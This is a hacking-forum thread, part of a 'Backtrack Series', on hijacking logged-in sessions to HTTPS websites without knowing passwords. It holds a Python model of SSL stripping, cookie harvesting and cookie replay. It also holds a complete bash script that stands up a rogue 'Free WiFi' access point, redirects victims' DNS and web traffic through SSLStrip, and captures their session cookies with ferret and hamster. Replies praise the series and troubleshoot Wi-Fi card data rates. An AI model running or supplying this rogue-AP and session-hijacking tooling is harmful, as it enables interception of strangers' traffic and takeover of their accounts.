Page 1 of 3, results 1 to 10 of 28

Thread: Backtrack Series - 12: Session Hijacking for Secure Websites

  1. #1
    Junior Member
    Join Date
    Feb 2010
    Posts
    38

    Default Backtrack Series - 12: Session Hijacking for Secure Websites

    In this tutorial we will hijack a live session so that we have the same privileges as the account, without knowing the username or password. We start by redirecting the secure traffic to an insecure server using SSLStrip; next we use ferret to extract cookies from the traffic, and then we use hamster to inject the cookies into the browser.

    This is the link for the online video:
    Online Video

    And here you can find the required files (video12.txt contains the complete explanation):
    Attachments
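The three stages the post chains together (SSLStrip downgrading the server's https:// references, ferret pulling cookies out of the now-plaintext requests, hamster replaying them) are easier to reason about with a small offline model. The block below is an added example written for this thread; it is not code from the original post, nor from sslstrip, ferret or hamster, and it runs on constructed sample traffic only. The host name `forum.example`, the `PHPSESSID` cookie and all header values are made up, and the `Stripper`, `harvest_cookies` and `replay_request` names are the example's own.

```python
# Added example (not the original post's code, nor sslstrip/ferret/hamster).
# Models the tutorial's pipeline offline on constructed data: downgrade the
# server response (sslstrip role), harvest cookies from the resulting
# plaintext client requests (ferret role), replay them (hamster role).
import re
from urllib.parse import urlsplit, urlunsplit


class Stripper:
    """sslstrip-style rewriter: sends http:// toward the victim and remembers
    what it stripped so it can still talk TLS to the real server."""

    def __init__(self):
        self.stripped = set()  # (host, path) pairs that were https upstream

    def _strip_url(self, url):
        parts = urlsplit(url)
        if parts.scheme.lower() != "https":
            return url
        self.stripped.add((parts.netloc.lower(), parts.path or "/"))
        return urlunsplit(("http", parts.netloc, parts.path, parts.query, parts.fragment))

    def rewrite_response(self, headers, body):
        """headers: list of (name, value) from the real server; body: HTML text.
        Returns (rewritten headers, rewritten body, hsts_seen)."""
        out, hsts_seen = [], False
        for name, value in headers:
            lname = name.lower()
            if lname == "strict-transport-security":
                # Dropping the header keeps first-time visitors strippable, but
                # a browser that already cached the policy refuses plain http.
                hsts_seen = True
                continue
            if lname == "set-cookie":
                # 'Secure' would stop the browser sending the cookie over http.
                value = re.sub(r";\s*secure(?=;|$)", "", value, flags=re.I)
            elif lname == "location":
                value = self._strip_url(value)
            out.append((name, value))
        body = re.sub(r"https://[^\s\"'<>]+", lambda m: self._strip_url(m.group(0)), body)
        return out, body, hsts_seen

    def upstream_scheme(self, host, path):
        """Scheme the proxy must use toward the real server for a victim request."""
        return "https" if (host.lower(), path) in self.stripped else "http"


def harvest_cookies(captured_requests):
    """ferret-style: parse raw HTTP requests seen on the wire and collect the
    cookies per host. Returns {host: {cookie_name: value}}."""
    jar = {}
    for raw in captured_requests:
        head = raw.partition("\r\n\r\n")[0]
        host, cookies = None, {}
        for line in head.split("\r\n")[1:]:
            name, _, value = line.partition(":")
            name, value = name.strip().lower(), value.strip()
            if name == "host":
                host = value.lower()
            elif name == "cookie":
                for pair in value.split(";"):
                    k, _, v = pair.strip().partition("=")
                    if k:
                        cookies[k] = v
        if host and cookies:
            jar.setdefault(host, {}).update(cookies)
    return jar


def replay_request(host, path, jar):
    """hamster-style: the request the attacker's browser sends once the
    harvested cookies are injected; no username or password is needed."""
    cookie = "; ".join(f"{k}={v}" for k, v in jar[host].items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie}\r\nConnection: close\r\n\r\n"


# Constructed sample traffic; not captured from any real site.
SERVER_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "PHPSESSID=abc123; Path=/; Secure; HttpOnly"),
    ("Location", "https://forum.example/index.php?page=1"),
]
SERVER_BODY = '<a href="https://forum.example/login">Login</a> <img src="http://cdn.example/x.png">'
VICTIM_REQUESTS = [
    "POST /login HTTP/1.1\r\nHost: forum.example\r\nCookie: PHPSESSID=abc123; lang=en\r\n\r\nuser=a&pass=b",
    "GET /index.php HTTP/1.1\r\nHost: forum.example\r\nCookie: PHPSESSID=abc123\r\n\r\n",
]


def run_demo():
    s = Stripper()
    headers, body, hsts = s.rewrite_response(SERVER_HEADERS, SERVER_BODY)
    jar = harvest_cookies(VICTIM_REQUESTS)
    return {
        "body": body,
        "set_cookie": dict(headers)["Set-Cookie"],
        "location": dict(headers)["Location"],
        "upstream_login": s.upstream_scheme("forum.example", "/login"),
        "hsts": hsts,
        "jar": jar,
        "replay": replay_request("forum.example", "/index.php", jar),
    }


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(f"{k}: {v!r}")
```

The `hsts_seen` flag is the caveat worth keeping in mind when the video's method does not work against a given site: a Strict-Transport-Security policy the victim's browser has already cached makes it refuse the downgraded http:// links regardless of what the proxy rewrites, so the cookie never crosses the wire in the clear. The `Secure` attribute removal shows the other half of why the attack works: only a cookie that the browser is willing to send over plain HTTP can be picked up by ferret on at0.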

  2. #2
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    5

    Default

    Can you post that modified Roguev3.sh? Please.

    And thanks, it's a good series, I love it :*

  3. #3
    Junior Member
    Join Date
    Feb 2010
    Posts
    38

    Default

    Quote Originally Posted by imaginary View Post
    Can you post that modified Roguev3.sh? Please.

    And thanks, it's a good series, I love it :*
    It's available in the attachments of my previous tutorial:
    Backtrack Series 11: Retrieving Forum Passwords Using MITM + Rcrack

    Thanks for the support.

  4. #4

    Default

    Another great video!
    Good quality and great content.
    Thank you, I'm looking forward to trying this soon. As mentioned in the other post, I'm also looking forward to more; keep up the great work.
    15" MBP 8 gigs o ram 256 gig SSD in drivebay + 256 gig 5400 HD
    1000HE EEE 30 gig SSD 2 gigs Ram

  5. #5

    Default

    *YEY*
    Another vid for the backtrack series!
    Will give it a go myself some stage tomorrow!
    Well done && thanks! (=

    edit:
    Works well for me (=

    Download the video [HD] (with the guide & Roguev3.sh)
    http://www.mediafire.com/download.php?gyunjtyzmmu
    ~ Have you, g0tmi1k? ~

  6. #6
    Just burned his ISO (imported_K1LLb0x)
    Join Date
    Jun 2009
    Posts
    5

    Default

    Wow, your videos are awesome; keep up the good work and keep on using different programs...

  7. #7
    Senior Member (Nick_the_Greek)
    Join Date
    Jan 2010
    Location
    Greece
    Posts
    181

    Default Using the Roguev3.sh script + session 12 with ppp0 (PPPoA or PPPoE)

    Your videos are more than excellent. I was playing with your script and, since I use a DSL modem to connect to the internet, I modified your script a bit to work with point-to-point connections. So, here it is:

    Code:
    #!/bin/bash
    # Rogue AP + SSLStrip + ferret/hamster launcher for a PPPoE/PPPoA uplink (ppp0).
    echo -n "Enter the name of the interface connected to the internet, for example ppp0: "
    read -e IFACE
    echo -n "Enter your Internet IP address for ppp0, IP(XXX.XXX.XXX.XXX): "
    read -e INETIP
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    echo -n "Enter your wireless interface MAC(XX:XX:XX:XX:XX:XX) [Optional]: "
    read -e MAC
    echo -n "Enter the channel you would like your rogue AP to use [Optional]: "
    read -e CHAN

    # installing DNSMASQ (dnsmasq-base ships only the binary, no init script)
    apt-get install dnsmasq-base

    # kill anything left over from a previous run
    killall -9 dhcpcd dhcpd3 airbase-ng ettercap dnsmasq
    # stop mon0
    airmon-ng stop mon0
    airmon-ng stop "$WIFACE"

    ifconfig "$WIFACE" down
    airmon-ng start "$WIFACE"
    modprobe tun

    # Build the airbase-ng command as an array so an ESSID with spaces
    # ("Free WiFi") stays one argument instead of being word-split.
    cmd=(konsole -e airbase-ng -e "$ESSID" -P -C 30 -v)
    if [ -n "$CHAN" ]; then
        cmd+=(-c "$CHAN")
    fi
    if [ -n "$MAC" ]; then
        cmd+=(-a "$MAC")
    fi
    cmd+=("$WIFACE")
    "${cmd[@]}" &

    echo "Waiting 10 seconds for the SoftAP to be established"
    sleep 10
    echo "SoftAP should be working now"

    # at0 is the tap interface airbase-ng creates for the rogue AP's clients
    ifconfig at0 up
    ifconfig at0 192.168.1.129 netmask 255.255.255.128
    ifconfig at0 mtu 1400
    route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129

    # create custom dhcpd.conf for WLAN
    # my ISP's DNS servers are: 195.170.0.1 and 195.170.2.2

    cat > dhcpd.conf << EOF
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 192.168.1.128 netmask 255.255.255.128 {
    option subnet-mask 255.255.255.128;
    option broadcast-address 192.168.1.255;
    option routers 192.168.1.129;
    option domain-name-servers 195.170.0.1, 195.170.2.2;
    range 192.168.1.130 192.168.1.140;
    }
    EOF

    # reset the firewall, then NAT the clients out through the uplink
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o "$IFACE" -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT # rogue gateway

    # my internet's dynamic IP: pull every client DNS query to this box
    iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to "$INETIP"

    rm -f /var/run/dhcpd.pid
    touch /var/run/dhcpd.pid
    chgrp dhcpd /var/run/dhcpd.pid
    chown dhcpd /var/run/dhcpd.pid

    # run custom dhcpd file
    konsole -e dhcpd3 -d -f -cf dhcpd.conf at0 &

    ## start our dns forwarder (dnsmasq daemonizes itself and takes no
    ## "restart" argument; the old instance was killed above)
    dnsmasq

    konsole -e ettercap -T -p -q -i at0 // // &
    echo "Waiting 8 seconds for portforwarding and DHCP server"
    sleep 8
    echo "1" > /proc/sys/net/ipv4/ip_forward
    echo "Portforwarding and DHCP should be working now"

    # Starting SSLStrip
    konsole -e sslstrip -p &
    echo "Starting SSLStrip"
    sleep 3

    # Forward all port 80 traffic to port 10000 (sslstrip's default listener)
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    echo "Forwarding all port 80 traffic to port 10000"
    sleep 3

    # Starting ferret
    konsole -e /pentest/sniffers/hamster/ferret -i at0 &
    echo "Starting ferret"
    sleep 3

    # Starting hamster
    konsole -e /pentest/sniffers/hamster/hamster &
    echo "Starting Hamster"
    sleep 3
    My IP is dynamic and the DNS servers of my ISP are 195.170.0.1 and 195.170.2.2.
    Sorry for any mistakes I have made (in the script and in English grammar and syntax). I have been in the scene since the Amstrad 464 (yes, with tape) and I am a little bit rusty (if that is the correct word).
    BTW, the only problem I have is that when I create an AP with airbase-ng (Atheros-based card, AR5001X+) the data rate is very slow. I tried both drivers, mac and madwifi. I changed rate, RTS, etc. and nothing changed. But when I create an AP with:
    Code:
    wlanconfig ath0 create wlandev wifi0 wlanmode ap
    iwconfig ath0 essid Come_to_Dady
    iwconfig ath0 rate 54M
    it works just great. Is it an airbase-ng related or a driver related problem?
    I am using the SVN version of Aircrack-ng and I was trying different channels, RTS, etc.
    Any idea?
    Anyway,
    my respects to all of you guys and especially to Pureh@te, who is helping everybody, even those kids who are too lazy to search around.
    Great work.

  8. #8
    Junior Member
    Join Date
    Feb 2010
    Posts
    38

    Default

    Thanks for the additional information.
    Please note that this script is a modified version of Deathray's script.
    I've noticed that it's slow with some configurations, like when the client uses Windows Vista.
    I'll try your method and then give you my feedback.

  9. #9
    Senior Member (Nick_the_Greek)
    Join Date
    Jan 2010
    Location
    Greece
    Posts
    181

    Default

    Any news, fifo_thekid?
    Have you achieved any higher data rates?
    I believe that to accomplish this kind of lesson the softAP you have made must act as an AP. Correct me if I am wrong. Also, is there some kind of setting I must configure on my Atheros-based WiFi card to make it act more accurately as an AP, apart from:
    Code:
    wlanconfig ath0 create wlandev wifi0 wlanmode ap
    iwconfig ath0 essid Home_wifi
    iwconfig ath0 channel 11
    iwconfig ath0 rate 54M
    I have read all the output that iwpriv and iwconfig give me.
    I understand some of it and am reading up on the rest.
    Since I am trying to get back into the scene (as a hobby) and the "have a life, growing kids" matter doesn't leave me much free time to read, the question is:
    Am I on the wrong path?
    Any idea?
    I am very ashamed of my English.
    Hope you understand me.

  10. #10
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    10

    Default

    Nice stuff... thx...

